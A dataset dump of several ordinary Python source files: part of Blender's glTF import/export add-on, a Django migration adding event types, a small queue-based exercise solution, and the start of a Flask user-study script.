Bones Only',\n description='Export Deformation bones only (and needed bones for hierarchy)',\n default=False\n )\n\n export_current_frame: BoolProperty(\n name='Use Current Frame',\n description='Export the scene in the current animation frame',\n default=False\n )\n\n export_skins: BoolProperty(\n name='Skinning',\n description='Export skinning (armature) data',\n default=True\n )\n\n export_all_influences: BoolProperty(\n name='Include All Bone Influences',\n description='Allow >4 joint vertex influences. 
Models may appear incorrectly in many viewers',\n default=False\n )\n\n export_morph: BoolProperty(\n name='Shape Keys',\n description='Export shape keys (morph targets)',\n default=True\n )\n\n export_morph_normal: BoolProperty(\n name='Shape Key Normals',\n description='Export vertex normals with shape keys (morph targets)',\n default=True\n )\n\n export_morph_tangent: BoolProperty(\n name='Shape Key Tangents',\n description='Export vertex tangents with shape keys (morph targets)',\n default=False\n )\n\n export_lights: BoolProperty(\n name='Punctual Lights',\n description='Export directional, point, and spot lights. '\n 'Uses \"KHR_lights_punctual\" glTF extension',\n default=False\n )\n\n export_displacement: BoolProperty(\n name='Displacement Textures (EXPERIMENTAL)',\n description='EXPERIMENTAL: Export displacement textures. '\n 'Uses incomplete \"KHR_materials_displacement\" glTF extension',\n default=False\n )\n\n will_save_settings: BoolProperty(\n name='Remember Export Settings',\n description='Store glTF export settings in the Blender project',\n default=False)\n\n # Custom scene property for saving settings\n scene_key = \"glTF2ExportSettings\"\n\n #\n\n def check(self, _context):\n # Ensure file extension matches format\n old_filepath = self.filepath\n self.filepath = ensure_filepath_matches_export_format(\n self.filepath,\n self.export_format,\n )\n return self.filepath != old_filepath\n\n def invoke(self, context, event):\n settings = context.scene.get(self.scene_key)\n self.will_save_settings = False\n if settings:\n try:\n for (k, v) in settings.items():\n if k == \"export_selected\": # Back compatibility for export_selected --> use_selection\n setattr(self, \"use_selection\", v)\n del settings[k]\n settings[\"use_selection\"] = v\n print(\"export_selected is now renamed use_selection, and will be deleted in a few release\")\n else:\n setattr(self, k, v)\n self.will_save_settings = True\n\n except (AttributeError, TypeError):\n self.report({\"ERROR\"}, \"Loading export settings failed. 
Removed corrupted settings\")\n del context.scene[self.scene_key]\n\n import sys\n preferences = bpy.context.preferences\n for addon_name in preferences.addons.keys():\n try:\n if hasattr(sys.modules[addon_name], 'glTF2ExportUserExtension') or hasattr(sys.modules[addon_name], 'glTF2ExportUserExtensions'):\n exporter_extension_panel_unregister_functors.append(sys.modules[addon_name].register_panel())\n except Exception:\n pass\n\n self.has_active_exporter_extensions = len(exporter_extension_panel_unregister_functors) > 0\n return ExportHelper.invoke(self, context, event)\n\n def save_settings(self, context):\n # find all props to save\n exceptional = [\n # options that don't start with 'export_'\n 'use_selection',\n 'use_visible',\n 'use_renderable',\n 'use_active_collection',\n 'use_mesh_edges',\n 'use_mesh_vertices',\n ]\n all_props = self.properties\n export_props = {\n x: getattr(self, x) for x in dir(all_props)\n if (x.startswith(\"export_\") or x in exceptional) and all_props.get(x) is not None\n }\n\n context.scene[self.scene_key] = export_props\n\n def execute(self, context):\n import os\n import datetime\n from .blender.exp import gltf2_blender_export\n\n if self.will_save_settings:\n self.save_settings(context)\n\n self.check(context) # ensure filepath has the right extension\n\n # All custom export settings are stored in this container.\n export_settings = {}\n\n export_settings['timestamp'] = datetime.datetime.now()\n\n export_settings['gltf_filepath'] = self.filepath\n export_settings['gltf_filedirectory'] = os.path.dirname(export_settings['gltf_filepath']) + '/'\n export_settings['gltf_texturedirectory'] = os.path.join(\n export_settings['gltf_filedirectory'],\n self.export_texture_dir,\n )\n export_settings['gltf_keep_original_textures'] = self.export_keep_originals\n\n export_settings['gltf_format'] = self.export_format\n export_settings['gltf_image_format'] = self.export_image_format\n export_settings['gltf_copyright'] = self.export_copyright\n export_settings['gltf_texcoords'] = self.export_texcoords\n export_settings['gltf_normals'] = self.export_normals\n export_settings['gltf_tangents'] = self.export_tangents and self.export_normals\n export_settings['gltf_loose_edges'] = self.use_mesh_edges\n export_settings['gltf_loose_points'] = self.use_mesh_vertices\n\n if self.is_draco_available:\n export_settings['gltf_draco_mesh_compression'] = self.export_draco_mesh_compression_enable\n export_settings['gltf_draco_mesh_compression_level'] = self.export_draco_mesh_compression_level\n export_settings['gltf_draco_position_quantization'] = self.export_draco_position_quantization\n export_settings['gltf_draco_normal_quantization'] = self.export_draco_normal_quantization\n export_settings['gltf_draco_texcoord_quantization'] = self.export_draco_texcoord_quantization\n export_settings['gltf_draco_color_quantization'] = self.export_draco_color_quantization\n export_settings['gltf_draco_generic_quantization'] = self.export_draco_generic_quantization\n else:\n export_settings['gltf_draco_mesh_compression'] = False\n\n export_settings['gltf_materials'] = self.export_materials\n export_settings['gltf_colors'] = self.export_colors\n export_settings['gltf_cameras'] = self.export_cameras\n\n # compatibility after renaming export_selected to use_selection\n if self.export_selected is True:\n self.report({\"WARNING\"}, \"export_selected is now renamed use_selection, and will be deleted in a few release\")\n export_settings['gltf_selected'] = self.export_selected\n else:\n 
export_settings['gltf_selected'] = self.use_selection\n\n export_settings['gltf_visible'] = self.use_visible\n export_settings['gltf_renderable'] = self.use_renderable\n export_settings['gltf_active_collection'] = self.use_active_collection\n\n # export_settings['gltf_selected'] = self.use_selection This can be uncomment when removing compatibility of export_selected\n export_settings['gltf_layers'] = True # self.export_layers\n export_settings['gltf_extras'] = self.export_extras\n export_settings['gltf_yup'] = self.export_yup\n export_settings['gltf_apply'] = self.export_apply\n export_settings['gltf_current_frame'] = self.export_current_frame\n export_settings['gltf_animations'] = self.export_animations\n if self.export_animations:\n export_settings['gltf_frame_range'] = self.export_frame_range\n export_settings['gltf_force_sampling'] = self.export_force_sampling\n if self.export_force_sampling:\n export_settings['gltf_def_bones'] = self.export_def_bones\n else:\n export_settings['gltf_def_bones'] = False\n export_settings['gltf_nla_strips'] = self.export_nla_strips\n else:\n export_settings['gltf_frame_range'] = False\n export_settings['gltf_move_keyframes'] = False\n export_settings['gltf_force_sampling'] = False\n export_settings['gltf_def_bones'] = False\n export_settings['gltf_skins'] = self.export_skins\n if self.export_skins:\n export_settings['gltf_all_vertex_influences'] = self.export_all_influences\n else:\n export_settings['gltf_all_vertex_influences'] = False\n export_settings['gltf_frame_step'] = self.export_frame_step\n export_settings['gltf_morph'] = self.export_morph\n if self.export_morph:\n export_settings['gltf_morph_normal'] = self.export_morph_normal\n else:\n export_settings['gltf_morph_normal'] = False\n if self.export_morph and self.export_morph_normal:\n export_settings['gltf_morph_tangent'] = self.export_morph_tangent\n else:\n export_settings['gltf_morph_tangent'] = False\n\n export_settings['gltf_lights'] = self.export_lights\n export_settings['gltf_displacement'] = self.export_displacement\n\n export_settings['gltf_binary'] = bytearray()\n export_settings['gltf_binaryfilename'] = (\n os.path.splitext(os.path.basename(self.filepath))[0] + '.bin'\n )\n\n user_extensions = []\n pre_export_callbacks = []\n post_export_callbacks = []\n\n import sys\n preferences = bpy.context.preferences\n for addon_name in preferences.addons.keys():\n try:\n module = sys.modules[addon_name]\n except Exception:\n continue\n if hasattr(module, 'glTF2ExportUserExtension'):\n extension_ctor = module.glTF2ExportUserExtension\n user_extensions.append(extension_ctor())\n if hasattr(module, 'glTF2ExportUserExtensions'):\n extension_ctors = module.glTF2ExportUserExtensions\n for extension_ctor in extension_ctors:\n user_extensions.append(extension_ctor())\n if hasattr(module, 'glTF2_pre_export_callback'):\n pre_export_callbacks.append(module.glTF2_pre_export_callback)\n if hasattr(module, 'glTF2_post_export_callback'):\n post_export_callbacks.append(module.glTF2_post_export_callback)\n export_settings['gltf_user_extensions'] = user_extensions\n export_settings['pre_export_callbacks'] = pre_export_callbacks\n export_settings['post_export_callbacks'] = post_export_callbacks\n\n return gltf2_blender_export.save(context, export_settings)\n\n def draw(self, context):\n pass # Is needed to get panels available\n\n\nclass GLTF_PT_export_main(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"\"\n bl_parent_id = \"FILE_PT_operator\"\n bl_options = 
{'HIDE_HEADER'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.prop(operator, 'export_format')\n if operator.export_format == 'GLTF_SEPARATE':\n layout.prop(operator, 'export_keep_originals')\n if operator.export_keep_originals is False:\n layout.prop(operator, 'export_texture_dir', icon='FILE_FOLDER')\n\n layout.prop(operator, 'export_copyright')\n layout.prop(operator, 'will_save_settings')\n\n\nclass GLTF_PT_export_include(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Include\"\n bl_parent_id = \"FILE_PT_operator\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n col = layout.column(heading = \"Limit to\", align = True)\n col.prop(operator, 'use_selection')\n col.prop(operator, 'use_visible')\n col.prop(operator, 'use_renderable')\n col.prop(operator, 'use_active_collection')\n\n col = layout.column(heading = \"Data\", align = True)\n col.prop(operator, 'export_extras')\n col.prop(operator, 'export_cameras')\n col.prop(operator, 'export_lights')\n\n\nclass GLTF_PT_export_transform(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Transform\"\n bl_parent_id = \"FILE_PT_operator\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.prop(operator, 'export_yup')\n\n\nclass GLTF_PT_export_geometry(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Geometry\"\n bl_parent_id = \"FILE_PT_operator\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.prop(operator, 'export_apply')\n layout.prop(operator, 'export_texcoords')\n layout.prop(operator, 'export_normals')\n col = layout.column()\n col.active = operator.export_normals\n col.prop(operator, 'export_tangents')\n layout.prop(operator, 'export_colors')\n\n col = layout.column()\n col.prop(operator, 'use_mesh_edges')\n col.prop(operator, 'use_mesh_vertices')\n\n layout.prop(operator, 'export_materials')\n col = layout.column()\n col.active = operator.export_materials == \"EXPORT\"\n col.prop(operator, 'export_image_format')\n\n\nclass GLTF_PT_export_geometry_compression(bpy.types.Panel):\n 
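# This compression panel is only shown when the Draco encoder library is available; see poll() below.\n    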
bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Compression\"\n bl_parent_id = \"GLTF_PT_export_geometry\"\n bl_options = {'DEFAULT_CLOSED'}\n\n def __init__(self):\n from io_scene_gltf2.io.com import gltf2_io_draco_compression_extension\n self.is_draco_available = gltf2_io_draco_compression_extension.dll_exists(quiet=True)\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n if operator.is_draco_available:\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw_header(self, context):\n sfile = context.space_data\n operator = sfile.active_operator\n self.layout.prop(operator, \"export_draco_mesh_compression_enable\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.active = operator.export_draco_mesh_compression_enable\n layout.prop(operator, 'export_draco_mesh_compression_level')\n\n col = layout.column(align=True)\n col.prop(operator, 'export_draco_position_quantization', text=\"Quantize Position\")\n col.prop(operator, 'export_draco_normal_quantization', text=\"Normal\")\n col.prop(operator, 'export_draco_texcoord_quantization', text=\"Tex Coord\")\n col.prop(operator, 'export_draco_color_quantization', text=\"Color\")\n col.prop(operator, 'export_draco_generic_quantization', text=\"Generic\")\n\n\nclass GLTF_PT_export_animation(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Animation\"\n bl_parent_id = \"FILE_PT_operator\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.prop(operator, 'export_current_frame')\n\n\nclass GLTF_PT_export_animation_export(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Animation\"\n bl_parent_id = \"GLTF_PT_export_animation\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw_header(self, context):\n sfile = context.space_data\n operator = sfile.active_operator\n self.layout.prop(operator, \"export_animations\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.active = operator.export_animations\n\n layout.prop(operator, 'export_frame_range')\n layout.prop(operator, 'export_frame_step')\n layout.prop(operator, 'export_force_sampling')\n layout.prop(operator, 'export_nla_strips')\n\n row = layout.row()\n row.active = operator.export_force_sampling\n row.prop(operator, 'export_def_bones')\n\n\nclass GLTF_PT_export_animation_shapekeys(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Shape Keys\"\n bl_parent_id = \"GLTF_PT_export_animation\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = 
context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw_header(self, context):\n sfile = context.space_data\n operator = sfile.active_operator\n self.layout.prop(operator, \"export_morph\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.active = operator.export_morph\n\n layout.prop(operator, 'export_morph_normal')\n col = layout.column()\n col.active = operator.export_morph_normal\n col.prop(operator, 'export_morph_tangent')\n\n\nclass GLTF_PT_export_animation_skinning(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Skinning\"\n bl_parent_id = \"GLTF_PT_export_animation\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\"\n\n def draw_header(self, context):\n sfile = context.space_data\n operator = sfile.active_operator\n self.layout.prop(operator, \"export_skins\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n sfile = context.space_data\n operator = sfile.active_operator\n\n layout.active = operator.export_skins\n layout.prop(operator, 'export_all_influences')\n\nclass GLTF_PT_export_user_extensions(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Exporter Extensions\"\n bl_parent_id = \"FILE_PT_operator\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n\n return operator.bl_idname == \"EXPORT_SCENE_OT_gltf\" and operator.has_active_exporter_extensions\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\nclass GLTF_PT_import_user_extensions(bpy.types.Panel):\n bl_space_type = 'FILE_BROWSER'\n bl_region_type = 'TOOL_PROPS'\n bl_label = \"Importer Extensions\"\n bl_parent_id = \"FILE_PT_operator\"\n bl_options = {'DEFAULT_CLOSED'}\n\n @classmethod\n def poll(cls, context):\n sfile = context.space_data\n operator = sfile.active_operator\n return operator.bl_idname == \"IMPORT_SCENE_OT_gltf\" and operator.has_active_importer_extensions\n\n def draw(self, context):\n layout = self.layout\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\nclass ExportGLTF2(bpy.types.Operator, ExportGLTF2_Base, ExportHelper):\n \"\"\"Export scene as glTF 2.0 file\"\"\"\n bl_idname = 'export_scene.gltf'\n bl_label = 'Export glTF 2.0'\n\n filename_ext = ''\n\n filter_glob: StringProperty(default='*.glb;*.gltf', options={'HIDDEN'})\n\n\ndef menu_func_export(self, context):\n self.layout.operator(ExportGLTF2.bl_idname, text='glTF 2.0 (.glb/.gltf)')\n\n\nclass ImportGLTF2(Operator, ImportHelper):\n \"\"\"Load a glTF 2.0 file\"\"\"\n bl_idname = 'import_scene.gltf'\n bl_label = 'Import glTF 2.0'\n bl_options = {'REGISTER', 'UNDO'}\n\n filter_glob: StringProperty(default=\"*.glb;*.gltf\", options={'HIDDEN'})\n\n files: CollectionProperty(\n name=\"File Path\",\n type=bpy.types.OperatorFileListElement,\n )\n\n loglevel: IntProperty(\n name='Log Level',\n description=\"Log Level\")\n\n 
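# note: loglevel is never set from the UI; set_debug_log() below derives it from bpy.app.debug_value on each import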
import_pack_images: BoolProperty(\n name='Pack Images',\n description='Pack all images into .blend file',\n default=True\n )\n\n merge_vertices: BoolProperty(\n name='Merge Vertices',\n description=(\n 'The glTF format requires discontinuous normals, UVs, and '\n 'other vertex attributes to be stored as separate vertices, '\n 'as required for rendering on typical graphics hardware. '\n 'This option attempts to combine co-located vertices where possible. '\n 'Currently cannot combine verts with different normals'\n ),\n default=False,\n )\n\n import_shading: EnumProperty(\n name=\"Shading\",\n items=((\"NORMALS\", \"Use Normal Data\", \"\"),\n (\"FLAT\", \"Flat Shading\", \"\"),\n (\"SMOOTH\", \"Smooth Shading\", \"\")),\n description=\"How normals are computed during import\",\n default=\"NORMALS\")\n\n bone_heuristic: EnumProperty(\n name=\"Bone Dir\",\n items=(\n (\"BLENDER\", \"Blender (best for re-importing)\",\n \"Good for re-importing glTFs exported from Blender. \"\n \"Bone tips are placed on their local +Y axis (in glTF space)\"),\n (\"TEMPERANCE\", \"Temperance (average)\",\n \"Decent all-around strategy. \"\n \"A bone with one child has its tip placed on the local axis \"\n \"closest to its child\"),\n (\"FORTUNE\", \"Fortune (may look better, less accurate)\",\n \"Might look better than Temperance, but also might have errors. \"\n \"A bone with one child has its tip placed at its child's root. \"\n \"Non-uniform scalings may get messed up though, so beware\"),\n ),\n description=\"Heuristic for placing bones. Tries to make bones pretty\",\n default=\"TEMPERANCE\",\n )\n\n guess_original_bind_pose: BoolProperty(\n name='Guess Original Bind Pose',\n description=(\n 'Try to guess the original bind pose for skinned meshes from '\n 'the inverse bind matrices. 
'\n 'When off, use default/rest pose as bind pose'\n ),\n default=True,\n )\n\n def draw(self, context):\n layout = self.layout\n\n layout.use_property_split = True\n layout.use_property_decorate = False # No animation.\n\n layout.prop(self, 'import_pack_images')\n layout.prop(self, 'merge_vertices')\n layout.prop(self, 'import_shading')\n layout.prop(self, 'guess_original_bind_pose')\n layout.prop(self, 'bone_heuristic')\n\n def invoke(self, context, event):\n import sys\n preferences = bpy.context.preferences\n for addon_name in preferences.addons.keys():\n try:\n if hasattr(sys.modules[addon_name], 'glTF2ImportUserExtension') or hasattr(sys.modules[addon_name], 'glTF2ImportUserExtensions'):\n importer_extension_panel_unregister_functors.append(sys.modules[addon_name].register_panel())\n except Exception:\n pass\n\n self.has_active_importer_extensions = len(importer_extension_panel_unregister_functors) > 0\n return ImportHelper.invoke(self, context, event)\n\n def execute(self, context):\n return self.import_gltf2(context)\n\n def import_gltf2(self, context):\n import os\n\n self.set_debug_log()\n import_settings = self.as_keywords()\n\n user_extensions = []\n\n import sys\n preferences = bpy.context.preferences\n for addon_name in preferences.addons.keys():\n try:\n module = sys.modules[addon_name]\n except Exception:\n continue\n if hasattr(module, 'glTF2ImportUserExtension'):\n extension_ctor = module.glTF2ImportUserExtension\n user_extensions.append(extension_ctor())\n import_settings['import_user_extensions'] = user_extensions\n\n if self.files:\n # Multiple file import\n ret = {'CANCELLED'}\n dirname = os.path.dirname(self.filepath)\n for file in self.files:\n path = os.path.join(dirname, file.name)\n if self.unit_import(path, import_settings) == {'FINISHED'}:\n ret = {'FINISHED'}\n return ret\n else:\n # Single file import\n return self.unit_import(self.filepath, import_settings)\n\n def unit_import(self, filename, import_settings):\n import time\n from .io.imp.gltf2_io_gltf import glTFImporter, ImportError\n from .blender.imp.gltf2_blender_gltf import BlenderGlTF\n\n try:\n gltf_importer = glTFImporter(filename, import_settings)\n gltf_importer.read()\n gltf_importer.checks()\n\n print(\"Data are loaded, start creating Blender stuff\")\n\n start_time = time.time()\n BlenderGlTF.create(gltf_importer)\n elapsed_s = \"{:.2f}s\".format(time.time() - start_time)\n print(\"glTF import finished in \" + elapsed_s)\n\n gltf_importer.log.removeHandler(gltf_importer.log_handler)\n\n return {'FINISHED'}\n\n except ImportError as e:\n self.report({'ERROR'}, e.args[0])\n return {'CANCELLED'}\n\n def set_debug_log(self):\n import logging\n if bpy.app.debug_value == 0:\n self.loglevel = logging.CRITICAL\n elif bpy.app.debug_value == 1:\n self.loglevel = logging.ERROR\n elif bpy.app.debug_value == 2:\n self.loglevel = logging.WARNING\n elif bpy.app.debug_value == 3:\n self.loglevel = logging.INFO\n else:\n self.loglevel = logging.NOTSET\n\n\ndef menu_func_import(self, context):\n self.layout.operator(ImportGLTF2.bl_idname, text='glTF 2.0 (.glb/.gltf)')\n\n\nclasses = (\n ExportGLTF2,\n GLTF_PT_export_main,\n GLTF_PT_export_include,\n GLTF_PT_export_transform,\n GLTF_PT_export_geometry,\n GLTF_PT_export_geometry_compression,\n GLTF_PT_export_animation,\n GLTF_PT_export_animation_export,\n GLTF_PT_export_animation_shapekeys,\n GLTF_PT_export_animation_skinning,\n GLTF_PT_export_user_extensions,\n ImportGLTF2,\n GLTF_PT_import_user_extensions\n)\n\n\ndef register():\n for c in classes:\n 
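# register each Operator/Panel subclass so Blender can instantiate it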
bpy.utils.register_class(c)\n # bpy.utils.register_module(__name__)\n\n # add to the export / import menu\n bpy.types.TOPBAR_MT_file_export.append(menu_func_export)\n bpy.types.TOPBAR_MT_file_import.append(menu_func_import)\n\n\ndef unregister():\n for c in classes:\n bpy.utils.unregister_class(c)\n for f in exporter_extension_panel_unregister_functors:\n f()\n exporter_extension_panel_unregister_functors.clear()\n\n for f in importer_extension_panel_unregister_functors:\n f()\n importer_extension_panel_unregister_functors.clear()\n\n # bpy.utils.unregister_module(__name__)\n\n # remove from the export / import menu\n bpy.types.TOPBAR_MT_file_export.remove(menu_func_export)\n bpy.types.TOPBAR_MT_file_import.remove(menu_func_import)\n","sub_path":"addons/io_scene_gltf2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":42290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"69233679","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('icekit_events', '0005_auto_20161024_1742'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='EventType',\n fields=[\n ('id', models.AutoField(primary_key=True, auto_created=True, serialize=False, verbose_name='ID')),\n ('title', models.CharField(max_length=255)),\n ('slug', models.SlugField(max_length=255)),\n ('is_public', models.BooleanField(default=True, help_text=b\"Public types are displayed to the public, e.g. 'talk', 'workshop', etc. Non-public types are used to indicate special behaviour, such as education or members events.\", verbose_name=b'Show to public?')),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.AddField(\n model_name='eventbase',\n name='primary_type',\n field=models.ForeignKey(to='icekit_events.EventType', blank=True, related_name='events', help_text=b'The primary type of this event: Talk, workshop, etc. 
Only public Event Types can be primary.', null=True),\n ),\n migrations.AddField(\n model_name='eventbase',\n name='secondary_types',\n field=models.ManyToManyField(related_name='secondary_events', to='icekit_events.EventType', help_text=b'Additional/internal types: Education or members events, for example.', blank=True),\n ),\n ]\n","sub_path":"icekit_events/migrations/0006_auto_20161107_1747.py","file_name":"0006_auto_20161107_1747.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"50499434","text":"from collections import deque\n\nn_of_materials = list(map(int, input().split()))\nmagic_values = deque(map(int, input().split()))\n\ndd = {'Doll': 0, 'Wooden train': 0, 'Teddy bear': 0, 'Bicycle': 0}\nwhile len(magic_values) > 0 and len(n_of_materials) > 0:\n material_value = n_of_materials.pop()\n magic_value = magic_values.popleft()\n result = material_value * magic_value\n if result == 0:\n if magic_value == 0 and material_value > 0:\n n_of_materials.append(material_value)\n elif magic_value > 0 and material_value == 0:\n magic_values.appendleft(magic_value)\n elif result < 0:\n result = material_value + magic_value\n n_of_materials.append(result)\n elif result == 400:\n dd['Bicycle'] += 1\n elif result == 300:\n dd['Teddy bear'] += 1\n elif result == 250:\n dd['Wooden train'] += 1\n elif result == 150:\n dd['Doll'] += 1\n elif result > 0:\n result = material_value + 15\n n_of_materials.append(result)\n\n# count how many distinct toy types were crafted in each required pair\ndoll_train = 0\nbear_bicycle = 0\n\nfor k, v in dd.items():\n if k == 'Doll' or k == 'Wooden train':\n if v > 0:\n doll_train += 1\n elif k == 'Teddy bear' or k == 'Bicycle':\n if v > 0:\n bear_bicycle += 1\nif doll_train > 1 or bear_bicycle > 1:\n print(\"The presents are crafted! 
Merry Christmas!\")\nelse:\n print(\"No presents this Christmas!\")\n\nn_of_materials = list(map(str, n_of_materials))\nmagic_values = list(map(str, magic_values))\n\nif len(n_of_materials) > 0:\n print(f'Materials left: {\", \".join(list(reversed(n_of_materials)))}')\nif len(magic_values) > 0:\n print(f'Magic left: {\", \".join(list(magic_values))}')\n\nfor key, value in sorted(dd.items()):\n if not value == 0:\n print(f'{key}: {value}')","sub_path":"Python Advanced Exam Preparation - 17 February 2020/santa's_present_factory.py","file_name":"santa's_present_factory.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"315045673","text":"from flask import Flask, render_template, request\nfrom itertools import product\nimport random\nimport os\nimport pandas as pd\nimport time\nfrom static.libs.record import *\n\n'''\nInject Marker\nmark0: rest\nmark1: eval\nmark2: save\nother: vis\n'''\n\napp = Flask(__name__)\n\nglobal tasks\nglobal taskCount\nglobal userAnswer\nglobal names\n\ntaskCount = -1\nuserAnswer = {}\n\ndef makeTask():\n df = pd.read_csv('static/data/task.csv', encoding='CP949')\n vis = ['bar', 'line', 'scatter', 'map']\n #task = ['Task1', 'Task2', 'Task3'] #A\n #task = ['Task1', 'Task2', 'Task4'] #B\n #task = ['Task1', 'Task3', 'Task4'] #C\n #task = ['Task2', 'Task3', 'Task4'] #D\n task = ['Task1', 'Task2', 'Task3', 'Task4'] #E\n design = ['shape', 'size', 'color']\n\n vis_marker = {'scatter':100, 'bar':200, 'line':300, 'map':400}\n task_marker = {'1':10, '2':20, '3':30, '4':40}\n design_marker = {'base':1, 'color':2, 'shape':3, 'size':4}\n\n items = [vis, task, design]\n result = list(product(*items))\n\n directoryList = []\n motherDirectory = 'templates/'\n defaultDirectory = 'vis/'\n for r in result:\n directory = motherDirectory + defaultDirectory + r[0] + '/' + r[1] + '/' + r[2] + '/'\n baseDirectory = motherDirectory + defaultDirectory + r[0] + '/' + r[1] + '/' + 'base/'\n\n files = os.listdir(directory)\n idx = random.randrange(0, 2)\n selectFile = files[idx] #current directory select\n baseFile = files[1-idx] #base directory select\n\n subdf = df[(df['vis']==r[0])&(df['taskNum']==int(r[1][-1]))&(df['type']==r[2])]\n basetask = subdf[subdf['filename'] == baseFile.replace('.html', '')]['task'].values.tolist()[0]\n selecttask = subdf[subdf['filename'] == selectFile.replace('.html', '')]['task'].values.tolist()[0]\n\n selectFileDirectory = directory.replace(motherDirectory, '') + selectFile\n baseFileDirectory = baseDirectory.replace(motherDirectory, '') + baseFile\n\n baseMarker = vis_marker[r[0]] + task_marker[r[1][-1]] + design_marker['base']\n selectMarker = vis_marker[r[0]] + task_marker[r[1][-1]] + design_marker[r[2]]\n\n directoryList.append((baseFileDirectory, basetask, baseMarker))\n directoryList.append((selectFileDirectory, selecttask, selectMarker))\n\n random.shuffle(directoryList)\n print(len(directoryList))\n return directoryList\n\nglobal testcount\nglobal testTasks\nglobal saveCount\ntestcount = -1\ntestTasks = []\nsaveCount = -1\n\ndef makeTestTask():\n global testTasks\n\n test_df = pd.read_csv('static/data/test_task.csv', encoding='CP949')\n motherDirectory = 'templates/'\n testDirectory = 'test/'\n\n test_file_list = os.listdir(motherDirectory + testDirectory.replace('/', ''))\n for file in test_file_list:\n subdf = test_df[test_df['filename'] == file.replace('.html', '')]\n path = 